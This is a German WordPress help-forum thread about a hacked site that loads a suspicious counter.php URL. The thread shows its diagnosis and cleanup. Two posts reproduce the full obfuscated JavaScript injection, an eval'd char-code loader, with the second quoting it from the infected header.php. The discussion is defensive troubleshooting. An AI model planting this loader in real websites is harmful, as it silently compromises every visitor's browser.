Virus, Malware oder .....?

  • Hallo,

    bei einem Kunden taucht seit heute eine Webseitenadresse auf die mir suspekt vorkommt:

    http://viadelcampo.com/:/counter.php

    Wenn man die Webseite allmytraveltips.ch mit FireFox aufruft und mit der Webkonsole verfolgt welche URL's geladen werden taucht fast am Ende die o.g. Webadresse auf.

    Kennt die jemand? Weiß zufällig jemand wie diese URL in den Quellcode kommt und ganz wichtig wie bekommt man diese wieder rauß?

    Über eine schnelle Antwort würde ich mich freuen.

    Und schonmal vielen Dank für eure Mühe.

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Nein.
    Ihr könnt aber selbst mal schaun

    http://www.allmytraveltips.ch

    Ich hab mir beim Quellcode durchsuchen schon einen Wolf gesucht. Ich hab den Virenscanner clamav drüber gejagt und ich habe sämtliche Wordpress-Dateien mit der neusten Version per FTP überschrieben.

    Trotzdem ist diese URL immer noch enthalten.

    Einmal editiert, zuletzt von z3networks (30. Januar 2013 um 15:27)

  • Dein WordPress hat einen inline IFRAME Hack, der Code in der Seite ist der:

    Code
    try{window.document.body++}catch(gdsgsdg){dbshre=89;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,114,23,53,25,94,106,90,109,102,95,105,107,38,92,108,96,88,108,94,63,103,92,101,94,104,111,31,31,98,96,109,88,101,94,33,36,50,5,3,7,5,23,24,25,26,114,37,107,107,93,27,52,24,32,98,111,107,104,51,41,42,109,97,90,94,96,99,91,90,103,107,102,38,92,105,104,38,50,40,93,106,108,102,109,95,109,37,104,97,106,34,50,5,3,26,27,23,24,112,40,110,107,113,101,95,41,103,103,108,99,111,96,103,103,26,56,23,31,90,92,110,102,100,110,110,96,30,51,6,4,27,23,24,25,113,41,106,108,114,102,96,37,90,104,108,95,92,106,25,55,27,30,40,32,53,8,1,24,25,26,27,110,38,108,110,116,99,93,39,98,96,96,95,97,110,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,114,37,107,109,115,103,92,38,112,99,95,107,96,25,55,27,30,41,105,114,34,50,5,3,26,27,23,24,112,40,110,107,113,101,95,41,99,93,95,110,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,114,37,107,109,115,103,92,38,109,105,107,23,53,25,33,44,103,112,32,53,8,1,5,3,26,27,23,24,98,96,27,31,25,93,105,94,108,101,94,104,111,37,95,94,110,64,99,93,102,95,105,107,58,114,67,95,31,31,112,33,36,32,24,116,7,5,23,24,25,26,27,23,24,25,94,106,90,109,102,95,105,107,38,112,108,100,107,93,33,33,55,91,97,111,26,100,91,53,85,33,114,83,31,55,54,42,91,97,111,56,34,32,51,6,4,27,23,24,25,26,27,23,24,93,105,94,108,101,94,104,111,37,95,94,110,64,99,93,102,95,105,107,58,114,67,95,31,31,112,33,36,37,89,105,106,96,101,92,60,98,100,99,92,33,113,36,50,5,3,26,27,23,24,118,7,5,116,33,33,35,54);s="";for(i=0;i-450!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}


    Aufgelöst sieht das dann so aus:


    Es befindet sich zwischen dem

    Code
    <[COLOR=#ff0000][B]body [/B][/COLOR]class="home page page-id-13 page-template page-template-onecolumn-page-php custom-background">

    und direkt vor

    Code
    <[COLOR=#ff0000][B]div [/B][/COLOR]id="wrapper" class="hfeed">


    wenn man die Hauptseite betrachtet.
    Ich würde nach dem [COLOR=#ff0000]body [/COLOR]tag in den Templates suchen und nach dem [COLOR=#ff0000]div[/COLOR]. Dazwischen müsste der Mist kleben. Wenn nicht, wird das ganze per Hook reingeklebt, dann müßte man untersuchen, wer das macht (Theme oder Plugin).

  • Hallo codestyling,
    vielen Dank für deine Antwort.

    Das ganze sah in der header.php so aus

    Zitat

    <?
    #336988#
    echo " <script type=\"text/javascript\" language=\"javascript\" > try{window.document.body++}catch(gdsgsdg){dbshre=89;}if(dbshre){asd=0;try{d=document.createElement(\"div\");d.innerHTML.a=\"asd\";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,114,23,53,25,94,106,90,109,102,95,105,107,38,92,108,96,88,108,94,63,103,92,101,94,104,111,31,31,98,96,109,88,101,94,33,36,50,5,3,7,5,23,24,25,26,114,37,107,107,93,27,52,24,32,98,111,107,104,51,41,42,109,97,90,94,96,99,91,90,103,107,102,38,92,105,104,38,50,40,93,106,108,102,109,95,109,37,104,97,106,34,50,5,3,26,27,23,24,112,40,110,107,113,101,95,41,103,103,108,99,111,96,103,103,26,56,23,31,90,92,110,102,100,110,110,96,30,51,6,4,27,23,24,25,113,41,106,108,114,102,96,37,90,104,108,95,92,106,25,55,27,30,40,32,53,8,1,24,25,26,27,110,38,108,110,116,99,93,39,98,96,96,95,97,110,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,114,37,107,109,115,103,92,38,112,99,95,107,96,25,55,27,30,41,105,114,34,50,5,3,26,27,23,24,112,40,110,107,113,101,95,41,99,93,95,110,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,114,37,107,109,115,103,92,38,109,105,107,23,53,25,33,44,103,112,32,53,8,1,5,3,26,27,23,24,98,96,27,31,25,93,105,94,108,101,94,104,111,37,95,94,110,64,99,93,102,95,105,107,58,114,67,95,31,31,112,33,36,32,24,116,7,5,23,24,25,26,27,23,24,25,94,106,90,109,102,95,105,107,38,112,108,100,107,93,33,33,55,91,97,111,26,100,91,53,85,33,114,83,31,55,54,42,91,97,111,56,34,32,51,6,4,27,23,24,25,26,27,23,24,93,105,94,108,101,94,104,111,37,95,94,110,64,99,93,102,95,105,107,58,114,67,95,31,31,112,33,36,37,89,105,106,96,101,92,60,98,100,99,92,33,113,36,50,5,3,26,27,23,24,118,7,5,116,33,33,35,54);s=\"\";for(i=0;i-450!=0;i++){if((020==0x10)&&window.document)s+=ss[\"fromCharCode\"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}</script>";

    #/336988#
    ?>

    Nur wer klebt mir das da rein und vor allen wie?
    Denn die htacces war auch betroffen.

    Wie kann man untersuchen welches Plugin für diese "Sche.." verantwortlich ist?

  • Nun hab ich den auch in einem Shopsystem.... bestimmt an die 100 Dateien befallen.. bin seit 8 Stunden dabei, ich hoffe nicht, dass die DB auch angegriffen ist
    Das verlixte Ding hat alle de Domains die bei Strato gehostet sind befallen
    würde auch gern wissen, wie ich das in der Zukunft verhindern kann

  • Habe ich gemacht. Ein Backup von vor Weihnachten 2012 installiert. Hat nichts gebracht nach ein paar Tagen war er wieder da.

    Ich habe die neuste Version von Wordpress jetzt per FTP hochgeladen und alle WP Dateien damit überschrieben. Die DB scheint nicht befallen zu sein.

    Der Schadcode ist in den letzten 2 Tagen nicht wieder aufgetaucht.

    Nur Kasperski scheint immer noch etwas zu erkennen, denn der blockiert die Seite immer noch. Ich habe aber noch nicht herausgefunden wieso.

    Passwörter ändern ist Pflicht.

  • Den DB Zugang abändern, neues Passwort, neuen Usernamen für den Zugang und das für ALLE bestehenden FTP Zugänge!

    Dazu den Rechner säubern und nach eventuellen Viren suche,

    Erst danach bringt es was, Wordpress sauber zu machen, denn ohne gesichteren Zugang bekommst du den Virus immer wieder aufgespielt.

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!